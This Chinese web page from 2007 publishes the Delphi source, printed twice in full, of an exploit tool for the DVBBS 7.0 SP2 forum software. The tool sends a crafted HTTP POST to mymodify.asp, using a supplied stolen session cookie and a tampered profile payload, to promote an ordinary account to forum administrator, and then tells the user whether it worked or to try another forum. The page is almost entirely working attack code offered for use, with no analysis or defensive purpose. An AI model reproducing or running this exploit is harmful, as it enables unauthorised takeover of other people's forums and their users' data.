DVBBS7.0Sp2前臺提權漏洞利用程序[Kendy版]源碼
更新時間:2007年01月16日 00:00:00 作者:
作者:Kendy 文章來源:Kendys Blog
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ScktComp, StdCtrls, ComCtrls, WinSkinData, ShellApi;
type
TForm1 = class(TForm)
Label1: TLabel;
Label2: TLabel;
Label3: TLabel;
Edit1: TEdit;
Edit2: TEdit;
Edit3: TEdit;
Button1: TButton;
ClientSocket1: TClientSocket;
GroupBox1: TGroupBox;
Memo1: TMemo;
Label4: TLabel;
StatusBar1: TStatusBar;
SkinData1: TSkinData;
procedure Button1Click(Sender: TObject);
procedure ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
Data: string;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;
i:integer;
begin
ClientSocket1.Close ;
if edit1.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入論壇地址!;
exit;
end;
if edit2.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入你的論壇賬號!;
exit;
end;
if edit3.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入抓取的Cookie!;
exit;
end;
memo1.Text :=;
StatusBar1.Panels[0].Text :=;
Label4.Caption :=;
sUrl:=edit1.Text ;
if Pos(http://,sUrl) <> 0 then
sUrl:=StringReplace(sUrl,http://,,[rfIgnoreCase]);
sUsername:=edit2.Text ;
sCookie:=edit3.Text ;
//--------Host-------------
i:=Pos(/,sUrl);
if i <> 0 then
sHost:=Copy(sUrl,0,i-1)
else
sHost:=sUrl;
//--------Referer-----------
sReferer:=http:// + sUrl + /mymodify.asp;
//--------POST--------------
sPost:=StringReplace(sUrl,sHost,,[rfIgnoreCase]);
sPost:=sPost + /mymodify.asp?action=updat&username= + sUsername;
//--------數(shù)據(jù)包------------
S:=sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%;
S:=S+2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理員|||1||||||120|||115|||28|||0||||||210.41.235.200|||;
S:=S+0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||Dvbbs&width=100&height=100;
S:=S+&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo;
S:=S+=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0;
S:=S+&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0;
Data:=POST +sPost+ HTTP/1.1+#13#10;
Data:=Data+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*+#13#10;
Data:=Data+Referer: +sReferer+#13#10;
Data:=Data+Accept-Language: zh-cn+#13#10;
Data:=Data+Content-Type: application/x-www-form-urlencoded+#13#10;
Data:=Data+Accept-Encoding: gzip, deflate+#13#10;
Data:=Data+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; TencentTraveler )+#13#10;
Data:=Data+Host: +sHost+#13#10;
Data:=Data+Content-Length: 585+#13#10;
Data:=Data+Connection: Keep-Alive+#13#10;
Data:=Data+Cache-Control: no-cache+#13#10;
Data:=Data+Cookie: + sCookie+#13#10+#13#10;
Data:=Data+S;
//--------開始發(fā)送數(shù)據(jù)包-------------
ClientSocket1.Host := sHost;
ClientSocket1.Port := 80;
ClientSocket1.Open ;
StatusBar1.Panels[0].Text :=數(shù)據(jù)發(fā)送中...;
end;
procedure TForm1.ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
begin
Socket.SendText(Data);
end;
procedure TForm1.ClientSocket1Read(Sender: TObject;
Socket: TCustomWinSocket);
begin
memo1.Text :=Socket.ReceiveText ;
if Pos(您的修改信息已成功提交,memo1.Text) <> 0 then
begin
Label4.Caption :=>>成功提升為前臺管理員!;
StatusBar1.Panels[0].Text :=成功,請重新登陸論壇!;
end
else
begin
Label4.Caption :=>> Sorry,提權失敗;
StatusBar1.Panels[0].Text :=失敗,換個論壇試試。;
end;
end;
procedure TForm1.ClientSocket1Error(Sender: TObject;
Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
var ErrorCode: Integer);
begin
ErrorCode:= 0;
StatusBar1.Panels[0].Text :=Error.....;
Exit;
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
ShellExecute(Handle,open,http://aliwy.77169.com,nil,nil,SW_SHOW);
end;
end.
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ScktComp, StdCtrls, ComCtrls, WinSkinData, ShellApi;
type
TForm1 = class(TForm)
Label1: TLabel;
Label2: TLabel;
Label3: TLabel;
Edit1: TEdit;
Edit2: TEdit;
Edit3: TEdit;
Button1: TButton;
ClientSocket1: TClientSocket;
GroupBox1: TGroupBox;
Memo1: TMemo;
Label4: TLabel;
StatusBar1: TStatusBar;
SkinData1: TSkinData;
procedure Button1Click(Sender: TObject);
procedure ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
Data: string;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;
i:integer;
begin
ClientSocket1.Close ;
if edit1.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入論壇地址!;
exit;
end;
if edit2.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入你的論壇賬號!;
exit;
end;
if edit3.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入抓取的Cookie!;
exit;
end;
memo1.Text :=;
StatusBar1.Panels[0].Text :=;
Label4.Caption :=;
sUrl:=edit1.Text ;
if Pos(http://,sUrl) <> 0 then
sUrl:=StringReplace(sUrl,http://,,[rfIgnoreCase]);
sUsername:=edit2.Text ;
sCookie:=edit3.Text ;
//--------Host-------------
i:=Pos(/,sUrl);
if i <> 0 then
sHost:=Copy(sUrl,0,i-1)
else
sHost:=sUrl;
//--------Referer-----------
sReferer:=http:// + sUrl + /mymodify.asp;
//--------POST--------------
sPost:=StringReplace(sUrl,sHost,,[rfIgnoreCase]);
sPost:=sPost + /mymodify.asp?action=updat&username= + sUsername;
//--------數(shù)據(jù)包------------
S:=sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%;
S:=S+2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理員|||1||||||120|||115|||28|||0||||||210.41.235.200|||;
S:=S+0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||Dvbbs&width=100&height=100;
S:=S+&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo;
S:=S+=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0;
S:=S+&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0;
Data:=POST +sPost+ HTTP/1.1+#13#10;
Data:=Data+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*+#13#10;
Data:=Data+Referer: +sReferer+#13#10;
Data:=Data+Accept-Language: zh-cn+#13#10;
Data:=Data+Content-Type: application/x-www-form-urlencoded+#13#10;
Data:=Data+Accept-Encoding: gzip, deflate+#13#10;
Data:=Data+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; TencentTraveler )+#13#10;
Data:=Data+Host: +sHost+#13#10;
Data:=Data+Content-Length: 585+#13#10;
Data:=Data+Connection: Keep-Alive+#13#10;
Data:=Data+Cache-Control: no-cache+#13#10;
Data:=Data+Cookie: + sCookie+#13#10+#13#10;
Data:=Data+S;
//--------開始發(fā)送數(shù)據(jù)包-------------
ClientSocket1.Host := sHost;
ClientSocket1.Port := 80;
ClientSocket1.Open ;
StatusBar1.Panels[0].Text :=數(shù)據(jù)發(fā)送中...;
end;
procedure TForm1.ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
begin
Socket.SendText(Data);
end;
procedure TForm1.ClientSocket1Read(Sender: TObject;
Socket: TCustomWinSocket);
begin
memo1.Text :=Socket.ReceiveText ;
if Pos(您的修改信息已成功提交,memo1.Text) <> 0 then
begin
Label4.Caption :=>>成功提升為前臺管理員!;
StatusBar1.Panels[0].Text :=成功,請重新登陸論壇!;
end
else
begin
Label4.Caption :=>> Sorry,提權失敗;
StatusBar1.Panels[0].Text :=失敗,換個論壇試試。;
end;
end;
procedure TForm1.ClientSocket1Error(Sender: TObject;
Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
var ErrorCode: Integer);
begin
ErrorCode:= 0;
StatusBar1.Panels[0].Text :=Error.....;
Exit;
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
ShellExecute(Handle,open,http://aliwy.77169.com,nil,nil,SW_SHOW);
end;
end.
相關文章
系統(tǒng)安全:Win XP SP2 配置及故障解決技巧大揭露
系統(tǒng)安全:Win XP SP2 配置及故障解決技巧大揭露...2007-01-01關于對河南網(wǎng)通封鎖局域網(wǎng)共享上網(wǎng)的破解
關于對河南網(wǎng)通封鎖局域網(wǎng)共享上網(wǎng)的破解...2007-01-01